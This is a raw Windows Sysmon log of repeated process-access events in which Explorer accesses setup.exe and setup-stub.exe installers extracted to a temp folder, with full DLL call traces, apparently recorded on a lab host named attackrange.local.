13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015556Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015555Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015554Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.599{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000015553Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.599{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000015552Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.599{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000015551Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.599{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000015550Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.599{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000015549Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.599{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000015548Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.599{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000015547Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.599{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000015546Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.599{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000015545Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.599{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000015544Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.599{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000015543Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.599{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000015542Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.599{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000015541Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.599{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000015540Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.599{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000015539Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.599{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.